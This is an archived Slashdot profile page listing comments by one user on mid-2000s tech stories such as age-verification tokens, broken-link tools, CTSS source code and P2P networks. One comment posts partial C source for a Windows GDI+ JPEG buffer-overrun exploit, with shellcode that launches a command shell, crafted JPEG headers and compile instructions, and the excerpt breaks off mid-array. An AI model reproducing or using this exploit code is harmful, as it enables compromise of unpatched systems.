Slashdot Mirror


User: julesh

julesh's activity in the archive.

Stories
0
Comments
8,446
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 8,446

  1. Re:Credit card ? on Verisign Develops Token for Age Verification · · Score: 1

    The big thing with a credit card vs a debit card is that the company is more likely to get their money from a credit card if you don't return/mess up the car.

    With a debit, you might not have the "available credit" balance they consider 'necessary'


    Ah, I see. It is, of course, illegal for them to operate like this, because you're entitled to withdraw your permission for them to take money from your credit card at any time, no matter what contracts you may have signed. But I guess they get away with it because most people don't know that.

  2. Re:Nothing is perfect! on Verisign Develops Token for Age Verification · · Score: 1

    Whoa whoa whoa... How does this PROTECT children? We're giving them tokens that restrict their personal access while at school, right? How does that protect them at home? At the library? At the inet cafe? WHY are their schools allowing connections to chatrooms and lewd material at all? Why should you need a key to designate you can't do that kind of surfing in school?

    I think you've missed the point. The key is intended to _permit_ access to certain chatrooms, not to exclude. The idea is that if a chatroom only allows people with these keys in, it'll keep the pervs out. This is, of course, stupid, due to the number of these little devices that'll get lost, stolen, sold, borrowed, or whatever.

  3. Re:Credit card ? on Verisign Develops Token for Age Verification · · Score: 1

    Of course there's not much to stop a smart pedophile (or pedophiles) from finding a way to create their own tokens (what age do you want to be today?)

    That's probably very hard. If it's been designed correctly, it'll produce a certificate that has been signed by verisign's private key.

    Copying them is theoretically possible, although they've probably been designed well enough to make that almost impossible.

  4. Re:Changing the world on Verisign Develops Token for Age Verification · · Score: 1

    So every chatroom in existence has to be rewritten in order to use the token scheme? Why would anyone go to the trouble of doing this? If schools want safe chatrooms, why don't they just set up their own network and do the authentication themselves? Expecting the whole world to change to support your authentication scheme seems a little farfetched.

    I can see ways of achieving this that don't require modification to the chatroom. You give the kids an application they can use to verify each other. It gives a random number, which the kid asking for verification passes to the chatter he's trying to ID; that chatter enters it into his own application, and it produces a signed message (with necessary certificates) that he can paste back to the other end, which can then be pasted into the verification app and checked.

    Its cumbersome, and no kid is _ever_ going to do it more than once, just to find out how it works, but it would do the job.

    Of course, that's not what they're doing here.

  5. Re:My rights as an anonymous online individual on Verisign Develops Token for Age Verification · · Score: 1

    somehow it should infringe upon their right to freedom of assembly. Albeit, a *virtual* assembly, it's an assembly!

    You don't have the right to freely assemble anywhere you want. This is only being used to prevent certain people (those without the ID tokens) assembling in particular places (chatrooms run with the intent of only allowing access to children with the tokens). These people are free to assemble elsewhere, if they so wish.

  6. Re:Gender? on Verisign Develops Token for Age Verification · · Score: 3, Insightful

    One of the biggest strengths of the internet is the ability to discuss issues anonymously

    So let me get this straight -- these kids are having to prove their identity in order to be able to discuss stuff anonymously. That makes sense.

  7. Re:Simple solution on Broken Links No More? · · Score: 1

    ErrorDocument 404 script.pl

    That would be very useful if I could persuade everyone I link to to do it. However, since I can't, a solution that runs on the server where the links reside, not the linked content, is much more useful.

  8. Re:In other developments.... on Broken Links No More? · · Score: 1

    Unfortunately, this is happening in Europe, and (at least at present) such ideas aren't patentable in Europe.

  9. Re:And... ? on Broken Links No More? · · Score: 2, Insightful

    It doesn't only find broken links -- it also alerts you if the content changes substantially. This sounds very useful to me.

  10. Re:No more broken bookmarks... on Broken Links No More? · · Score: 1

    How about an error message and a pointer to something similar? That's one of the options that this software provides, if your RTFA.

  11. Re:Take this with a grain of salt on Broken Links No More? · · Score: 2, Informative

    If you read the article (the BBC one, which is the only link in there with any relevant information) you'll find that's not how it works. It alerts the webmaster and suggests a replacement, rather than randomly "fixing" other people's pages.

  12. Re:Not direct on Source Code for CTSS released · · Score: 1

    Yes.

    MS, Apple and MIT were all consciously copying Xerox's ideas when they implemented Windows, MacOS and X11.

  13. Re:Credit card ? on Verisign Develops Token for Age Verification · · Score: 1


    I'm convinced that the card companies don't tell anyone if its debit or credit and they have just compiled lists of acceptable CC Prefixes.


    Given that Visa charge a different rate for authorising a credit card (percentage of total) to a debig card (which is on a flat rate), I'm pretty sure they must tell people.

    What's amusing is that the company that wouldn't take a debit card for renting a car would actually lose money for going with the credit card, because the percentage would be a lot bigger cut out of their margin than the flat rate.

  14. Re:Not direct on Source Code for CTSS released · · Score: 1

    Probably not, but I don't think your analogy works. We're talking here about 3 systems that were developed largely in parallel, borrowing concepts from each other. This is not the way it happened with these operating systems, each of which was consciously modelled on previous systems with the notion that it might replace them.

    A more accurate analogy would be to ask if I considered KDE a descendant of the GUI systems developed at Xerox PARC. And I do.

  15. Re:It is? on Source Code for CTSS released · · Score: 1

    I don't believe UNIX contained any CTSS code, either. I suspect the submitter meant conceptually, not in the sharing code sense.

  16. Re:Not direct on Source Code for CTSS released · · Score: 1

    Well, as I understand things, Linux is heavily influenced by Unix, whose design was fairly influenced by Multics, whose design was kind-of based on CTSS.

    All of those were openly acknowledged influences, and the primary ones (other than the hardware that the OSs were targeting, and the new features they wanted to add).

  17. Re:A BitTorrent of the source file... on Source Code for CTSS released · · Score: 1

    And you're gonna need it, cause we've slashdotted the server already.

    Bet they never thought an OS that'll only run on a machine of which there were probably less than a thousand ever made would be so popular...

  18. Re:Level 5 WHEN? on "Levels" of Computers the Future? · · Score: 1

    Maybe each system should be ranked by its PERFORMANCE (MIPS), and not some arbitrary numbering system.

    MIPS just doesn't give the consumer enough information. If they purchased on that alone, they'd end up with the wrong system.

    Here's a novel idea -- why not describe computer systems by how well they run a particular popular application?

    This is a "High-performance Microsoft Office XP" PC; that's a "Doom 3 at 70FPS" machine; but this one's an "encode DVD to Xvid at 3x real time".

  19. Re:I already do this except my levels are in $ on "Levels" of Computers the Future? · · Score: 3, Insightful

    It even scales correctly as technologie comes out.

    No it doesn't. 10 years ago, I doubt you'd have been able to get a $500 computer, let alone one with "mid range processor and memory". 20 years ago, $1500 is the only one of your price ranges that would have got you a PC.

    Sure, the pricing changes slower than the actual capabilities of the computer, but there is a shift to lower cost going on as well.

  20. Re:Why stop at motor vehicles? on Automotive Tires Without Air · · Score: 1

    I use these in London

    Wow. You just linked a site with no content _and_ a really annoying flash animation that plays music at you. Thanks! ;)

  21. Much more interesting on Cold Sugar Cloud Found in Space · · Score: 1

    Personally, I found the discovery of alcohol in space clouds a lot more interesting.

    Sugar? Boring.

  22. Re:RSA tokens on Sims 2 Blocked by CD Copying Software · · Score: 1

    If I am paying $49.95US for a video game, they can afford the additional cost of the token.

    Probably not. Those tokens are actually pretty expensive, and more of that $50 goes on the costs of development/distribution/marketing than you'd expect. (Although I think the RSA patents have expired now -- I wonder if there are cheap far eastern knock-off devices available yet?)

    They would also require the computer system you run the game on to have an accurate time set (usually needs to be within a minute, IIRC).

  23. Re:win2k on Public Exploit For Windows JPEG Bug · · Score: 2, Informative

    Here's the copy I tested with (compiles with just about any C compiler, I used MS Visual C++ with the command line "cl /MD exploit.c"). I've disassembled the shell code to be sure it does what's claimed, and it seems legit to me.

    // Lameness filter doesn't like C code....
    //aksdnckdnaslcjknasdcjknasdlcnjklasdncj klasdnckldnscjkldnaslcjkansdjklcnasljkcnaalksdjncl ajksdnclka
    //asdjkcnhladksjcnklasdjcnklasdjnclajk sdncklasndlckjansdcjknalsdkclaksdjcnlajkdnclaknldj klaegfjkaehg
    //12345kjbfjwerv7890werw14hbfwjfbkjk 2jksnksbhcjksbckjhbkdbakjbdkcjbskcjabkyuajwjbhawhj fgasdiouchacbk
    //aduicyga897schjawegiuci7akcajhwb vekjhcaw78cyakdjachbdjkka7w6ieucbdihcbajksdhbciauy cguaddbiua76teui
    //jkasdbcdbhsajkbhsdcabsdjkcbkad kcabscadcbasbdcabddsbcasdcbascdbcasbdcadcbdasbcasb cjhabscadjkasdbckj
    //ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
    //ZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZ
    //ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
    //jkasdb cdbhsajkbhsdcabsdjkcbkadkcabscadcbasbdcabddsbcasdc bascdbcasbdcadcbdasbcasbcjhabscadjkasdbckj

    // GDI+ buffer overrun exploit by FoToZ
    // NB: the headers here are only sample headers taken from a .JPG file,
    // with the FF FE 00 01 inserted in header1.
    // Sample shellcode is provided
    // You can put approx. 2500 bytes of shellcode...who needs that much anyway
    // Tested on an unpatched WinXP SP1

    #include <direct.h>
    #include <stdio.h>

    char shellcode[]=
    "\x68" // push
    "cmd "
    "\x8B\xC4" // mov eax,esp
    "\x50" // push eax
    "\xB8\x44\x80\xC2\x77" // mov eax,77c28044h (address of system() on WinXP SP1)
    "\xFF\xD0" // call eax
    ;

    char header1[]=
    "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\ x46\x00\x01\x02\x00\x00\x64"
    "\x00\x64\x00\x00\xF F\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
    "\ x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x6 4\x6F\x62\x65"
    "\x00\x64\xC0\x00\x00\x00\x01\xFF\ xFE\x00\x01\x00\x14\x10\x10\x19"
    "\x12\x19\x27\x1 7\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
    "\x2E\x3E\x35\x35\x35\x35\x35\x3E";

    char setNOPs1[]=
    "\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
    " \x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\x D9\x75\xF8";

    char setNOPs2[]=
    "\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B "
    "\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x 3B\xD9\x75\xF8";

    char header2[]=
    "\x44"
    "\x44\x44\x44\x44\x44\x44\x44\ x44\x44\x44\x44\x44\x01\x15\x19\x19"
    "\x20\x1C\x2 0\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\ x2B"
    "\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x4 4\x44\x44\x44\x44\x44"
    "\x44\x44\x44\x44\x44\x44\ x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
    "\x44\x4 4\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\ xC0\x00"
    "\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x0 0\x02\x11\x01\x03\x11\x01"
    "\xFF\xC4\x00\xA2\x00\ x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
    "\x0 0\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\ x01\x01\x01"
    "\x01\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x01\x00\x02"
    "\x03\x10\x00\x02\ x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
    "\x05\x01\x0

  24. Re:Alternative: Shareaza-prepare to get snubbed on Kazaa Loses P2P Crown To Edonkey · · Score: 1

    The original Gnutella network is these days quite different from what it used to be and MP doesn't add there anything significant.

    I've run tests of Gnutella (using a recent LimeWire) and G2, and there is a significant difference. Gnutella's better at finding common files fast, but G2 is better at finding unusual files.

    G2 is also interesting because it is a _lot_ simpler than Gnutella. I once considered writing a Gnutella client (I had a particular need that wasn't fulfilled by any existing clients, and I hate working with other people's code), but was put off by the arcane complexity of the protocol. OTOH, G2 is nice and clean. Maybe one day I'll find the time to write an implementation... it wouldn't take long.

  25. Re:Duh! and Duh, Doh! for you on Ireland Cracks Down on Online Scammers · · Score: 1

    Don't you think they would quickly add a pause and this extra dialing in?

    Well, thats why it would be a random number, not something predictable.

    There may be ways to beat them (but don't bet on it - many modems do voice and a good hack might even voice-id a challange of numbers to be dialed back)

    Voice analysis is hard. If only a few countries implement blocks of this nature, they wouldn't bother doing anything about it.